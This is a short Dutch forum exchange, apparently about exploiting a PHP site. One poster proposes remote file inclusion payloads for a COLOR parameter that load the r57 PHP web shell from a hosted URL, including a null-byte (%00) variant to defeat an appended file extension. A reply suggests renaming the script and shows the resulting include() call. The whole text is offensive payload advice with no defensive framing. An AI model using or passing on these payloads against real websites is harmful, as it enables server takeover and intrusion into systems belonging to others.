Door regenpijp: Ik zou wat proberen als ?COLOR=http://127.0.0.1/r57 waar je r57 (php) script r57 heet zonder extensie of wat met een null-byte in de vorm van ?COLOR=http://127.0.0.1/r57.php%00, waar je script wel r57.php heet.
Is het niet simpeler om dat script gewoon even te renamen naar r57.php?
"?COLOR=http://127.0.0.1/r57" wordt dan:
include( "http://127.0.0.1/r57.php");